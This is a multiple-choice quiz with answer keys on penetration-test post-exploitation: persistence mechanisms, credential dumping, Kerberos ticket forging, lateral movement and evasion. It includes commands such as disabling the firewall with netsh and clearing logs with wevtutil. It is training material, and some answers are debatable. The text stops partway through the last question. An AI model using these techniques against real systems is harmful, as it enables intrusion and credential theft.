Post-Exploitation & Maintaining Access - MCQ Questions

1. What is the primary goal of post-exploitation in a penetration test?

A) Finding and fixing vulnerabilities
B) Exploiting multiple systems
C) Maintaining persistent access and gathering intelligence
D) Running DoS attacks

✅ Answer: C) Maintaining persistent access and gathering intelligence
Explanation: Post-exploitation is focused on maintaining access, escalating privileges, gathering sensitive data, and determining the value of the compromised system for further actions.

2. Which method is commonly used to maintain persistence on a Windows system?

A) SSH Tunneling
B) Backdoored SSH Keys
C) Creating a registry run key
D) ICMP Tunneling

✅ Answer: C) Creating a registry run key
Explanation: Attackers can add malicious entries in Windows Registry under HKCU\Software\Microsoft\Windows\CurrentVersion\Run to automatically execute payloads on startup.

3. What is a common persistence mechanism used in Linux environments?

A) Sticky Keys Attack
B) Cron Job Execution
C) DLL Sideloading
D) ARP Poisoning

✅ Answer: B) Cron Job Execution
Explanation: Attackers often add a malicious cron job in /etc/crontab or a user’s crontab (crontab -e) to execute scripts at regular intervals.

4. What is the primary function of Meterpreter’s `persistence` module?

A) Encrypting network traffic
B) Establishing a reverse shell at system startup
C) Exploiting buffer overflows
D) Conducting SQL Injection attacks

✅ Answer: B) Establishing a reverse shell at system startup
Explanation: The persistence module in Metasploit’s Meterpreter sets up an automated connection back to the attacker each time the system reboots.

5. What is the advantage of using a rootkit in post-exploitation?

A) It allows privilege escalation
B) It helps evade detection by hiding processes
C) It can brute-force user passwords
D) It scans for open ports

✅ Answer: B) It helps evade detection by hiding processes
Explanation: Rootkits can hide malicious processes, files, and network connections, making them difficult to detect using traditional security tools.

6. What is the primary risk of leaving backdoors in a compromised system?

A) It can be detected by antivirus software
B) Other attackers may find and exploit it
C) The system will slow down significantly
D) The logs will get deleted

✅ Answer: B) Other attackers may find and exploit it
Explanation: Unsecured backdoors can be discovered by other malicious actors, leading to unintended system compromises.

7. How does a DNS Tunneling attack help in maintaining access?

A) It injects malicious JavaScript into DNS packets
B) It allows data exfiltration through DNS queries
C) It changes the DNS records on the target machine
D) It disrupts the domain name resolution process

✅ Answer: B) It allows data exfiltration through DNS queries
Explanation: Attackers use DNS tunneling to bypass security controls and exfiltrate data through encoded DNS requests and responses.

8. Which post-exploitation technique involves manipulating legitimate system processes to execute malicious code?

A) DLL Injection
B) SQL Injection
C) Cross-Site Scripting
D) Credential Stuffing

✅ Answer: A) DLL Injection
Explanation: DLL Injection involves forcing a legitimate process to load and execute a malicious DLL, often used for stealthy persistence.

9. What tool is commonly used for credential dumping on Windows?

A) Hydra
B) Mimikatz
C) Sqlmap
D) Nmap

✅ Answer: B) Mimikatz
Explanation: Mimikatz extracts credentials from memory, including plaintext passwords, NTLM hashes, and Kerberos tickets.

10. What is the main purpose of privilege escalation in post-exploitation?

A) Crashing the system
B) Gaining higher-level access for executing more powerful commands
C) Flooding the network with requests
D) Running a virus scanner

✅ Answer: B) Gaining higher-level access for executing more powerful commands
Explanation: Privilege escalation allows attackers to gain admin/system/root access, enabling deeper system control.

11. Which file can an attacker modify to maintain SSH persistence on a Linux system?

A) /etc/hosts
B) ~/.ssh/authorized_keys
C) /etc/passwd
D) /etc/sudoers

✅ Answer: B) ~/.ssh/authorized_keys
Explanation: Attackers add their SSH public key to ~/.ssh/authorized_keys for persistent access.

12. What is the main reason attackers use PowerShell scripts in post-exploitation?

A) It is slow and inefficient
B) It is commonly blocked by Windows Defender
C) It allows fileless attacks and avoids AV detection
D) It only runs on Linux

✅ Answer: C) It allows fileless attacks and avoids AV detection
Explanation: PowerShell scripts can execute payloads directly in memory, bypassing antivirus detection.

13. What is Lateral Movement in post-exploitation?

A) Moving laterally between physical networks
B) Accessing and compromising additional systems within the network
C) Sending phishing emails
D) Brute-forcing passwords

✅ Answer: B) Accessing and compromising additional systems within the network
Explanation: Attackers use Lateral Movement to spread through the network, often using stolen credentials.

14. What is the primary function of Kerberoasting?

A) Exploiting a vulnerable SSH service
B) Cracking Kerberos service tickets to extract plaintext passwords
C) Deploying ransomware on a domain controller
D) Hijacking user sessions

✅ Answer: B) Cracking Kerberos service tickets to extract plaintext passwords
Explanation: Kerberoasting abuses weak service account passwords to extract and crack Kerberos TGS tickets.

15. What is the purpose of using a Web Shell in maintaining access?

A) To disable firewall protections
B) To allow remote command execution via a web interface
C) To brute-force user credentials
D) To inject SQL queries into a database

✅ Answer: B) To allow remote command execution via a web interface
Explanation: Web Shells (e.g., China Chopper) allow attackers to execute commands on a compromised web server.

16. Which of the following tools is commonly used for post-exploitation activities such as pivoting and lateral movement?

A) Nessus
B) Cobalt Strike
C) Wireshark
D) Nikto

✅ Answer: B) Cobalt Strike
Explanation: Cobalt Strike provides post-exploitation tools such as pivoting, privilege escalation, and beacon communication, making it popular among both pentesters and adversaries.

17. What is the purpose of “Golden Ticket” attacks in post-exploitation?

A) Creating a fake Active Directory domain
B) Gaining long-term domain admin access using forged Kerberos tickets
C) Encrypting network traffic
D) Sending phishing emails

✅ Answer: B) Gaining long-term domain admin access using forged Kerberos tickets
Explanation: Golden Ticket attacks use forged Kerberos TGTs to grant persistent access to a Windows domain, often bypassing authentication mechanisms.

18. What is the advantage of using a reverse shell in post-exploitation?

A) The attacker’s IP remains hidden
B) The target system initiates the connection, bypassing firewalls
C) It cannot be detected by antivirus
D) It is the fastest method of privilege escalation

✅ Answer: B) The target system initiates the connection, bypassing firewalls
Explanation: Reverse shells work by having the compromised system connect back to the attacker, evading inbound firewall restrictions.

19. What type of malware is designed to provide long-term access and evade detection on a system?

A) Worm
B) Rootkit
C) Ransomware
D) Keylogger

✅ Answer: B) Rootkit
Explanation: Rootkits operate at the kernel level, hiding their presence and providing persistent access.

20. Which Windows feature can be abused for persistent access via scheduled task execution?

A) Task Manager
B) Windows Defender
C) Task Scheduler
D) Registry Editor

✅ Answer: C) Task Scheduler
Explanation: Attackers can use schtasks.exe to schedule a malicious script or payload to execute at regular intervals.

21. What attack technique involves reusing an existing authenticated session token to gain unauthorized access?

A) Token Hijacking
B) ARP Spoofing
C) SQL Injection
D) DNS Spoofing

✅ Answer: A) Token Hijacking
Explanation: Token Hijacking allows an attacker to reuse a stolen session token for unauthorized access.

22. What does the `Sticky Keys` attack exploit?

A) Command execution by replacing accessibility executables
B) SQL Injection in authentication fields
C) Buffer overflow in Windows
D) Network traffic manipulation

✅ Answer: A) Command execution by replacing accessibility executables
Explanation: Attackers replace Sticky Keys (sethc.exe) with a malicious shell, allowing command execution at the login screen.

23. What is the function of an attacker-controlled Command & Control (C2) server in post-exploitation?

A) Encrypting compromised data
B) Sending commands and receiving data from infected machines
C) Disabling security software
D) Running phishing campaigns

✅ Answer: B) Sending commands and receiving data from infected machines
Explanation: C2 servers allow attackers to remotely control compromised hosts, exfiltrate data, and execute commands.

24. How does a “Pass-the-Hash” attack work?

A) Cracking hashed passwords to plaintext
B) Using stolen password hashes to authenticate without cracking them
C) Exploiting weak hashing algorithms
D) Injecting malicious hashes into a database

✅ Answer: B) Using stolen password hashes to authenticate without cracking them
Explanation: Pass-the-Hash allows an attacker to reuse NTLM or LM hashes for authentication without knowing the plaintext password.

25. Which of the following can be used to execute malicious code without dropping files on disk?

A) Process Hollowing
B) Brute Force Attack
C) Directory Traversal
D) SQL Injection

✅ Answer: A) Process Hollowing
Explanation: Process Hollowing injects malicious code into a legitimate process, executing it in-memory to evade AV detection.

26. What is a “Silver Ticket” attack used for?

A) Exploiting SQL servers
B) Gaining access to specific Kerberos service tickets
C) Conducting phishing campaigns
D) Bypassing multi-factor authentication

✅ Answer: B) Gaining access to specific Kerberos service tickets
Explanation: Silver Tickets allow attackers to forge service tickets (TGS) and gain unauthorized access.

27. What is a key feature of an obfuscated payload in post-exploitation?

A) It is impossible to detect
B) It is encrypted to avoid detection
C) It causes immediate system crashes
D) It requires user interaction to execute

✅ Answer: B) It is encrypted to avoid detection
Explanation: Obfuscation techniques encode or encrypt payloads to bypass security solutions.

28. What is an effective method to establish long-term persistence on a compromised web server?

A) Editing /etc/hosts
B) Deploying a web shell
C) Modifying the ARP table
D) Using Wireshark

✅ Answer: B) Deploying a web shell
Explanation: Attackers often use web shells (e.g., c99.php) to maintain remote access.

29. What post-exploitation tool is specifically designed to bypass UAC (User Account Control) in Windows?

A) WinPeas
B) UACMe
C) Hydra
D) sqlmap

✅ Answer: B) UACMe
Explanation: UACMe exploits Windows User Account Control (UAC) to escalate privileges.

30. Which file stores local user password hashes on a Windows system?

A) /etc/passwd
B) SAM
C) NetNTLM.dat
D) NTDS.dit

✅ Answer: B) SAM
Explanation: Windows Security Account Manager (SAM) stores hashed passwords in the registry.

31. What persistence method involves replacing legitimate Windows services with a malicious binary?

A) DLL Injection
B) Service Hijacking
C) Command Injection
D) Keylogging

✅ Answer: B) Service Hijacking
Explanation: Attackers modify service executables or configurations to launch backdoors at startup.

32. What does the term “living off the land” (LOTL) refer to in post-exploitation?

A) Using built-in system tools for attacks
B) Running payloads in remote locations
C) Using Tor for anonymity
D) Running malware on a compromised system

✅ Answer: A) Using built-in system tools for attacks
Explanation: LOTL attacks leverage native tools (e.g., PowerShell, WMI, PsExec) to avoid detection.

33. What is the primary purpose of a bind shell in post-exploitation?

A) To initiate a connection back to the attacker
B) To listen for incoming connections from an attacker
C) To execute malware on the target system
D) To modify firewall rules

✅ Answer: B) To listen for incoming connections from an attacker
Explanation: A bind shell opens a port on the compromised machine and waits for an attacker to connect.

34. Which Windows feature allows attackers to execute scripts in-memory, avoiding disk-based detection?

A) Group Policy
B) Windows Script Host (WSH)
C) Active Directory
D) Registry Editor

✅ Answer: B) Windows Script Host (WSH)
Explanation: WSH enables the execution of scripts (.vbs, .js, .wsf) without writing files to disk.

35. What is the purpose of a keylogger in post-exploitation?

A) Logging all system errors
B) Capturing and recording keystrokes
C) Modifying system logs
D) Preventing brute-force attacks

✅ Answer: B) Capturing and recording keystrokes
Explanation: Keyloggers record user input, allowing attackers to steal passwords and other sensitive data.

36. Which attack technique exploits scheduled tasks to maintain persistence on a Windows system?

A) Registry Injection
B) Task Hijacking
C) DDE Exploitation
D) Pass-the-Ticket

✅ Answer: B) Task Hijacking
Explanation: Attackers modify scheduled tasks to run malicious commands at predefined times.

37. What is the purpose of disabling security software in post-exploitation?

A) To avoid detection and maintain access
B) To improve system performance
C) To install legitimate software
D) To prevent system crashes

✅ Answer: A) To avoid detection and maintain access
Explanation: Attackers often disable antivirus, firewalls, and logging mechanisms to remain undetected.

38. Which command in Windows is used to enumerate active user sessions?

A) net use
B) query user
C) arp -a
D) tracert

✅ Answer: B) query user
Explanation: The query user command lists logged-in users and active sessions on a Windows system.

39. What does `netsh advfirewall set allprofiles state off` do on a Windows system?

A) Enables the firewall for all profiles
B) Disables the firewall for all profiles
C) Creates a new firewall rule
D) Logs all firewall activity

✅ Answer: B) Disables the firewall for all profiles
Explanation: This command disables the Windows firewall, allowing unrestricted network access.

40. What persistence technique abuses Windows Management Instrumentation (WMI)?

A) WMI Event Subscription
B) WMI Packet Injection
C) WMI Buffer Overflow
D) WMI Reverse Shell

✅ Answer: A) WMI Event Subscription
Explanation: WMI event subscriptions execute payloads when specific system events occur.

41. What is the purpose of using `net use \\target\C$ /user:Administrator` in post-exploitation?

A) Creating a new user
B) Mapping a hidden administrative share
C) Modifying system logs
D) Encrypting system files

✅ Answer: B) Mapping a hidden administrative share
Explanation: The C$ administrative share provides remote access to C:\ drive on Windows systems.

42. What does the `persistence` module in Metasploit do?

A) Hides the attacker’s presence
B) Ensures a backdoor runs after reboot
C) Deletes system logs
D) Blocks antivirus detection

✅ Answer: B) Ensures a backdoor runs after reboot
Explanation: The persistence module creates registry keys or scheduled tasks to maintain access.

43. What is the primary purpose of using `wevtutil` in post-exploitation?

A) Modifying Windows registry
B) Dumping or clearing event logs
C) Creating new user accounts
D) Executing remote code

✅ Answer: B) Dumping or clearing event logs
Explanation: wevtutil can export, delete, or modify Windows event logs to cover attack traces.

44. How does an attacker use DLL Sideloading to maintain access?

A) By modifying system registry entries
B) By replacing legitimate DLLs with malicious ones
C) By modifying network configurations
D) By creating new user accounts

✅ Answer: B) By replacing legitimate DLLs with malicious ones
Explanation: DLL Sideloading loads a malicious DLL instead of a legitimate one, gaining execution privileges.

45. What method allows attackers to execute code with SYSTEM privileges?

A) Kerberoasting
B) Token Impersonation
C) ARP Spoofing
D) Cross-Site Scripting

✅ Answer: B) Token Impersonation
Explanation: Token Impersonation allows attackers to steal high-privilege tokens, executing commands as SYSTEM.

46. What command in Linux is commonly used to escalate privileges?

A) whoami
B) sudo -i
C) ifconfig
D) ls -la

✅ Answer: B) sudo -i
Explanation: sudo -i elevates the user to root privileges, allowing unrestricted system access.

47. Which technique involves modifying system binaries to execute malware?

A) Binary Padding
B) Binary Hijacking
C) Kernel Injection
D) Phishing

✅ Answer: B) Binary Hijacking
Explanation: Binary Hijacking replaces system binaries with malicious versions.

48. What is the function of the `schtasks` command in Windows?

A) Disables the firewall
B) Creates scheduled tasks
C) Dumps memory contents
D) Modifies Active Directory policies

✅ Answer: B) Creates scheduled tasks
Explanation: schtasks is used to create and manage scheduled tasks for persistence.

49. How does a “Doppelganging” attack evade security detection?

A) By modifying system logs
B) By injecting malicious code into processes without writing to disk
C) By hiding in encrypted files
D) By disabling antivirus

✅ Answer: B) By injecting malicious code into processes without writing to disk
Explanation: Process Doppelgänging allows malware to bypass AV detection by running fileless.

50. What tool is commonly used to exploit misconfigured SMB shares?

A) Responder
B) John the Ripper
C) Empire
D) CrackMapExec

✅ Answer: D) CrackMapExec
Explanation: CrackMapExec is used for SMB enumeration and exploitation.

51. What is the primary advantage of using PowerShell Empire in post-exploitation?

A) It automates SQL Injection attacks
B) It provides a framework for fileless attacks
C) It is used for network scanning
D) It encrypts stolen data

✅ Answer: B) It provides a framework for fileless attacks
Explanation: PowerShell Empire enables fileless persistence, executing payloads directly in memory to bypass AV detection.

52. What is the purpose of a `Golden SAML` attack?

A) Bypassing Active Directory authentication using forged SAML assertions
B) Extracting SAML tokens from encrypted databases
C) Exploiting vulnerabilities in LDAP authentication
D) Cracking NTLM hashes

✅ Answer: A) Bypassing Active Directory authentication using forged SAML assertions
Explanation: Golden SAML attacks involve forging SAML authentication tokens to impersonate users and gain unauthorized access.

53. Which protocol is commonly exploited for Lateral Movement in a Windows domain environment?

A) FTP
B) RDP
C) SMTP
D) SNMP

✅ Answer: B) RDP
Explanation: Attackers use Remote Desktop Protocol (RDP) for moving between systems within a Windows domain.

54. What is the function of `rundll32.exe` in post-exploitation?

A) Encrypting files
B) Loading and executing DLL files
C) Deleting system logs
D) Establishing persistence via SSH

✅ Answer: B) Loading and executing DLL files
Explanation: Attackers use rundll32.exe to execute malicious DLLs while evading security software.

55. What does the `secedit` command do in Windows post-exploitation?

A) Modifies security policies
B) Extracts password hashes
C) Terminates active user sessions
D) Alters Active Directory objects

✅ Answer: A) Modifies security policies
Explanation: Attackers can use secedit to modify system security settings, often disabling defenses.

56. What is an effective way to maintain persistence on macOS?

A) Modifying Windows registry
B) Using Launch Agents and Launch Daemons
C) Running Mimikatz
D) Injecting PowerShell scripts

✅ Answer: B) Using Launch Agents and Launch Daemons
Explanation: Launch Agents (~/Library/LaunchAgents) and Launch Daemons (/Library/LaunchDaemons) enable macOS persistence.

57. What is a “Ghost User” in post-exploitation?

A) A deleted user account that still has access
B) A hidden administrator account
C) A user that is invisible in logs but active
D) A decoy user account for distraction

✅ Answer: B) A hidden administrator account
Explanation: Attackers create “ghost users” by modifying user attributes to maintain access without detection.

58. What is the purpose of `wmic` in post-exploitation?

A) Gathering system information and executing remote commands
B) Modifying NTFS permissions
C) Encrypting files before exfiltration
D) Running SQL queries on the target machine

✅ Answer: A) Gathering system information and executing remote commands
Explanation: WMIC (Windows Management Instrumentation Command-line) allows system enumeration, execution, and process manipulation.

59. What does the `reg add` command do in Windows?

A) Creates new user accounts
B) Adds new registry entries for persistence
C) Modifies Active Directory users
D) Kills running processes

✅ Answer: B) Adds new registry entries for persistence
Explanation: Attackers use reg add to modify Windows Registry for maintaining access or executing payloads.

60. Which protocol is commonly used for tunneling attacks to bypass security restrictions?

A) UDP
B) SSH
C) ICMP
D) SMTP

✅ Answer: C) ICMP
Explanation: ICMP tunneling allows attackers to send malicious data within ICMP packets, evading detection.

61. What attack involves manipulating Windows Authentication Packages to steal credentials?

A) Skeleton Key Attack
B) Credential Stuffing
C) Kerberoasting
D) NTLM Relay Attack

✅ Answer: A) Skeleton Key Attack
Explanation: Skeleton Key malware injects a malicious authentication package, allowing attackers to use a universal password.

62. What method is commonly used to maintain access on cloud environments like AWS?

A) Deploying a web shell
B) Creating hidden IAM users and access keys
C) Using Mimikatz
D) Encrypting network traffic

✅ Answer: B) Creating hidden IAM users and access keys
Explanation: Attackers maintain AWS persistence by creating backdoor IAM users with high privileges.

63. What does a “Domain Fronting” attack accomplish?

A) Conceals malicious traffic within legitimate domains
B) Executes SQL Injection against domains
C) Creates hidden subdomains for phishing
D) Allows DNS cache poisoning

✅ Answer: A) Conceals malicious traffic within legitimate domains
Explanation: Domain Fronting masks C2 traffic by routing through legitimate domains.

64. Which service is commonly exploited for gaining persistence via Windows Services?

A) svchost.exe
B) winlogon.exe
C) lsass.exe
D) explorer.exe

✅ Answer: A) svchost.exe
Explanation: svchost.exe hosts system services, and attackers often use service hijacking for persistence.

65. What is an example of an attack using Alternate Data Streams (ADS) in NTFS?

A) Hiding malware within a legitimate file without changing its size
B) Injecting malicious SQL queries
C) Conducting brute-force attacks
D) Manipulating Active Directory

✅ Answer: A) Hiding malware within a legitimate file without changing its size
Explanation: ADS in NTFS allows malware to hide inside legitimate files without modifying file properties.

66. What is the purpose of “Living off the Land Binaries and Scripts” (LOLBAS)?

A) Using built-in system tools to evade detection
B) Encrypting all stolen data
C) Running privilege escalation exploits
D) Creating botnets

✅ Answer: A) Using built-in system tools to evade detection
Explanation: LOLBAS attacks use trusted system binaries (e.g., mshta, regsvr32) to execute malicious code without detection.

67. What is the purpose of an attacker modifying the hosts file (`C:\Windows\System32\drivers\etc\hosts`)?

A) Redirecting domain requests to malicious servers
B) Modifying system logs
C) Extracting password hashes
D) Disabling security updates

✅ Answer: A) Redirecting domain requests to malicious servers
Explanation: Attackers modify the hosts file to redirect traffic to fake login pages.

68. Which of the following allows for long-term persistence by modifying user authentication tokens?

A) Pass-the-Hash
B) Pass-the-Ticket
C) Lateral Movement
D) Heap Spraying

✅ Answer: B) Pass-the-Ticket
Explanation: Pass-the-Ticket (PTT) allows attackers to reuse Kerberos tickets for unauthorized authentication.

69. What is a key characteristic of a fileless malware attack?

A) It resides entirely in memory without writing to disk
B) It requires user interaction to execute
C) It can only infect Linux systems
D) It modifies system boot settings

✅ Answer: A) It resides entirely in memory without writing to disk
Explanation: Fileless malware executes directly in memory, bypassing traditional antivirus solutions.

70. Which of the following Windows event logs is most useful for tracking unauthorized user logins?

A) System Log
B) Security Log
C) Application Log
D) Setup Log

✅ Answer: B) Security Log
Explanation: The Security Log (Event ID 4624, 4625, 4768, 4769) tracks logins, authentication attempts, and failures.

71. What is the main purpose of `PsExec` in post-exploitation?

A) Running commands remotely on Windows systems
B) Extracting password hashes
C) Manipulating Active Directory objects
D) Conducting SQL Injection attacks

✅ Answer: A) Running commands remotely on Windows systems
Explanation: PsExec allows attackers to execute commands on remote machines without requiring RDP.

72. What does `net group "Domain Admins" /domain` reveal in a compromised environment?

A) The current firewall settings
B) The list of domain administrator accounts
C) A list of all active users
D) The network interface configurations

✅ Answer: B) The list of domain administrator accounts
Explanation: Attackers use this command to enumerate high-privilege domain users.

73. How can an attacker use `certutil` maliciously?

A) Downloading and decoding malware
B) Manipulating DNS records
C) Deleting system logs
D) Creating fake domain certificates

✅ Answer: A) Downloading and decoding malware
Explanation: Certutil can be abused to fetch and decode malicious payloads, bypassing security controls.

74. What is the purpose of “PowerSploit” in post-exploitation?

A) A PowerShell framework for post-exploitation tasks
B) A brute-force password cracker
C) A tool for encrypting exfiltrated data
D) A Linux privilege escalation tool

✅ Answer: A) A PowerShell framework for post-exploitation tasks
Explanation: PowerSploit contains modules for privilege escalation, credential dumping, and persistence.

75. What is the purpose of the “Sticky Keys Backdoor” technique?

A) Launching a system shell from the login screen
B) Bypassing anti-malware software
C) Modifying Windows group policies
D) Manipulating BIOS settings

✅ Answer: A) Launching a system shell from the login screen
Explanation: Attackers replace sethc.exe with cmd.exe, allowing unauthenticated access to a system shell.

76. What is the role of `svchost.exe` in process injection attacks?

A) It allows attackers to inject malicious payloads into a system process
B) It is used for network reconnaissance
C) It prevents privilege escalation
D) It logs all system changes

✅ Answer: A) It allows attackers to inject malicious payloads into a system process
Explanation: Attackers inject malicious code into svchost.exe to evade security tools.

77. How does a “Token Stealing” attack work in Windows?

A) By copying authentication tokens from memory to impersonate users
B) By brute-forcing login credentials
C) By modifying registry keys
D) By injecting JavaScript into login forms

✅ Answer: A) By copying authentication tokens from memory to impersonate users
Explanation: Token Stealing allows an attacker to reuse existing authentication tokens for lateral movement.

78. What is the purpose of `Invoke-Mimikatz` in post-exploitation?

A) Extracting credentials from memory
B) Running a network scan
C) Encrypting communication channels
D) Modifying firewall rules

✅ Answer: A) Extracting credentials from memory
Explanation: Invoke-Mimikatz is a PowerShell script that calls Mimikatz for credential dumping.

79. How do attackers use `rundll32.exe` for stealthy execution?

A) By executing malicious DLLs in a legitimate process
B) By modifying the Windows kernel
C) By disabling Windows updates
D) By blocking network traffic

✅ Answer: A) By executing malicious DLLs in a legitimate process
Explanation: Attackers use rundll32.exe to load malicious DLLs, avoiding detection.

80. What does a “Silver Ticket” attack allow an attacker to do?

A) Forge service tickets for Kerberos authentication
B) Inject malicious JavaScript into webpages
C) Capture NTLM hashes over SMB
D) Modify domain group policies

✅ Answer: A) Forge service tickets for Kerberos authentication
Explanation: Silver Ticket attacks bypass authentication by forging Kerberos TGS tickets.

81. What command in Linux displays scheduled tasks?

A) crontab -l
B) netstat -an
C) iptables -L
D) whoami

✅ Answer: A) crontab -l
Explanation: crontab -l lists all scheduled cron jobs, which attackers may modify for persistence.

82. What does the `net use` command do in Windows post-exploitation?

A) Establishes a connection to remote SMB shares
B) Dumps memory contents
C) Creates a new domain admin account
D) Runs PowerShell scripts

✅ Answer: A) Establishes a connection to remote SMB shares
Explanation: net use allows access to shared folders, which can be exploited for lateral movement.

83. What is an advantage of using a Web Shell in post-exploitation?

A) Provides persistent access through a web interface
B) Encrypts the entire filesystem
C) Forces all users to change their passwords
D) Disables security software

✅ Answer: A) Provides persistent access through a web interface
Explanation: Attackers use web shells (e.g., c99.php) to execute commands remotely.

84. What is an example of a persistence mechanism on Windows using DLL hijacking?

A) Dropping a malicious DLL into a trusted directory
B) Using a SQL Injection attack
C) Running a phishing campaign
D) Exploiting a router vulnerability

✅ Answer: A) Dropping a malicious DLL into a trusted directory
Explanation: Attackers place malicious DLLs in trusted locations, tricking the system into loading them.

85. What does `at.exe` allow an attacker to do?

A) Schedule tasks for later execution
B) Modify Active Directory policies
C) Extract password hashes
D) Scan for open ports

✅ Answer: A) Schedule tasks for later execution
Explanation: at.exe schedules commands to execute later, often used for persistence.

86. What does the “Golden Ticket” attack allow an attacker to do?

A) Create forged Kerberos TGTs for unrestricted access
B) Inject malicious payloads into kernel processes
C) Brute-force administrator passwords
D) Disable Windows Defender

✅ Answer: A) Create forged Kerberos TGTs for unrestricted access
Explanation: Golden Ticket attacks allow attackers to generate Kerberos TGTs, giving persistent domain access.

87. What is the main goal of “Island Hopping” in post-exploitation?

A) Moving laterally across multiple connected organizations
B) Encrypting user data for ransom
C) Exploiting buffer overflows for privilege escalation
D) Hijacking network traffic using ARP spoofing

✅ Answer: A) Moving laterally across multiple connected organizations
Explanation: Island Hopping involves using one compromised network to attack another connected network.

88. Which PowerShell command allows an attacker to execute remote scripts without dropping files on disk?

A) Invoke-WebRequest
B) Get-Process
C) netsh firewall off
D) whoami /priv

✅ Answer: A) Invoke-WebRequest
Explanation: Attackers use Invoke-WebRequest to download and execute remote payloads without writing them to disk.

89. What persistence technique involves creating a malicious BHO (Browser Helper Object) in Windows?

A) DLL Hijacking
B) Registry Run Key Injection
C) Browser Exploit Persistence
D) BHO-based Persistence

✅ Answer: D) BHO-based Persistence
Explanation: BHOs (Browser Helper Objects) are DLLs that run within Internet Explorer, allowing attackers to maintain access.

90. What is the main advantage of using a Domain Controller (DC) as a persistence mechanism?

A) It allows for stealthy malware execution
B) It provides long-term access with full network control
C) It enables brute-force attacks
D) It prevents antivirus detection

✅ Answer: B) It provides long-term access with full network control
Explanation: Compromising a DC allows attackers to control authentication, policies, and users across the domain.

91. Which tool is commonly used to extract LSA secrets from a Windows machine?

A) BloodHound
B) Mimikatz
C) Metasploit
D) Hydra

✅ Answer: B) Mimikatz
Explanation: Mimikatz extracts LSA secrets, Kerberos tickets, and NTLM hashes for privilege escalation.

92. What attack abuses the `SAM` and `SYSTEM` registry hives to retrieve hashed credentials?

A) Credential Dumping
B) SQL Injection
C) NTLM Relay Attack
D) Pass-the-Ticket

✅ Answer: A) Credential Dumping
Explanation: Attackers use SAM & SYSTEM hive extraction to retrieve hashed passwords.

93. What is a common persistence technique using Microsoft Office macros?

A) Embedding malicious VBA code into Office documents
B) Injecting payloads into Windows Defender
C) Disabling PowerShell execution policies
D) Modifying group policy settings

✅ Answer: A) Embedding malicious VBA code into Office documents
Explanation: Attackers use Office macros to execute malware when documents are opened.

94. How does an attacker use “AppLocker Bypass” for post-exploitation?

A) By using whitelisted system binaries to execute malicious code
B) By modifying firewall rules
C) By brute-forcing administrative credentials
D) By disabling event logs

✅ Answer: A) By using whitelisted system binaries to execute malicious code
Explanation: Attackers bypass AppLocker by abusing trusted executables to execute payloads.

95. What is the primary use of “Token Duplication” in post-exploitation?

A) To impersonate high-privilege users
B) To create new user accounts
C) To encrypt network traffic
D) To brute-force passwords

✅ Answer: A) To impersonate high-privilege users
Explanation: Token Duplication allows attackers to steal high-privilege user access tokens.

96. What does the “Skeleton Key” malware do in a post-exploitation scenario?

A) Enables domain-wide authentication bypass
B) Encrypts system files for ransom
C) Scans for open ports on a network
D) Injects malicious JavaScript into websites

✅ Answer: A) Enables domain-wide authentication bypass
Explanation: Skeleton Key malware allows attackers to bypass Active Directory authentication.

97. What does an attacker achieve with “Registry Run Key Injection”?

A) Persistent execution of malicious payloads at system startup
B) Brute-forcing password hashes
C) Creating new firewall rules
D) Scanning network devices

✅ Answer: A) Persistent execution of malicious payloads at system startup
Explanation: Registry Run Key Injection ensures that malicious payloads execute every time the system boots.

98. What does an attacker achieve using “NTLM Relay Attacks”?

A) Authenticate to services without cracking passwords
B) Bypass file system permissions
C) Conduct brute-force login attempts
D) Modify Windows firewall settings

✅ Answer: A) Authenticate to services without cracking passwords
Explanation: NTLM Relay Attacks allow authentication without knowing the password, exploiting SMB signing misconfigurations.

99. What technique allows attackers to replace a legitimate Windows service executable with a malicious one?

A) Service Binary Path Hijacking
B) DLL Injection
C) Phishing Attack
D) Kerberoasting

✅ Answer: A) Service Binary Path Hijacking
Explanation: Attackers replace the binary path of a legitimate Windows service with a malicious executable, ensuring persistence.

100. What does “Code Cave Injection” involve?

A) Injecting malicious code into unused memory space of an executable
B) Injecting JavaScript into login forms
C) Manipulating kernel memory
D) Replacing system drivers

✅ Answer: A) Injecting malicious code into unused memory space of an executable
Explanation: Code Cave Injection places malicious code in an unused portion of an executable’s memory, allowing stealthy execution.

101. What is the primary goal of using “Domain Replication” attacks in post-exploitation?

A) Extracting password hashes from Active Directory
B) Running privilege escalation exploits
C) Deploying ransomware on multiple machines
D) Modifying Group Policy settings

✅ Answer: A) Extracting password hashes from Active Directory
Explanation: Domain Replication attacks (e.g., DCSync) abuse Active Directory replication to steal NTLM hashes of all domain users.

102. What is the function of a “C2 beacon” in a post-exploitation framework?

A) Establishes communication between the attacker and compromised host
B) Scans for vulnerabilities in web applications
C) Creates new user accounts on the system
D) Encrypts system logs

✅ Answer: A) Establishes communication between the attacker and compromised host
Explanation: C2 (Command & Control) beacons allow attackers to remotely send commands and receive data from compromised machines.

103. What is the advantage of using “Reflective DLL Injection” in post-exploitation?

A) Executes malicious DLLs in memory without writing to disk
B) Runs scripts on Linux systems
C) Prevents antivirus from detecting malware
D) Bypasses brute-force protection mechanisms

✅ Answer: A) Executes malicious DLLs in memory without writing to disk
Explanation: Reflective DLL Injection loads a malicious DLL into memory without needing it to be written on disk, reducing AV detection.

104. How can attackers use “Kerberos Overpass-the-Hash” attacks?

A) Use NTLM hashes to request Kerberos tickets
B) Modify Active Directory group policies
C) Intercept network traffic
D) Execute JavaScript payloads remotely

✅ Answer: A) Use NTLM hashes to request Kerberos tickets
Explanation: Kerberos Overpass-the-Hash allows attackers to use NTLM hashes to authenticate via Kerberos.

105. What is the purpose of “DLL Search Order Hijacking”?

A) Forcing a program to load a malicious DLL instead of a legitimate one
B) Disabling Windows firewall rules
C) Manipulating NTFS file permissions
D) Deleting Windows event logs

✅ Answer: A) Forcing a program to load a malicious DLL instead of a legitimate one
Explanation: DLL Search Order Hijacking abuses how Windows loads DLLs, making an application execute a malicious DLL instead.

106. What technique allows attackers to steal plaintext passwords stored in memory?

A) Credential Dumping
B) SSH Brute-Forcing
C) DNS Tunneling
D) Lateral Movement

✅ Answer: A) Credential Dumping
Explanation: Credential Dumping extracts plaintext passwords and hashes from memory (e.g., using Mimikatz).

107. What tool is commonly used for extracting passwords stored in web browsers?

A) LaZagne
B) Hydra
C) Metasploit
D) sqlmap

✅ Answer: A) LaZagne
Explanation: LaZagne extracts saved passwords from web browsers, databases, and system credentials.

108. How can attackers use “WMI Event Subscription” for persistence?

A) Automatically execute malicious payloads when specific system events occur
B) Modify network firewall rules
C) Exploit DNS misconfigurations
D) Scan for vulnerabilities in SMB shares

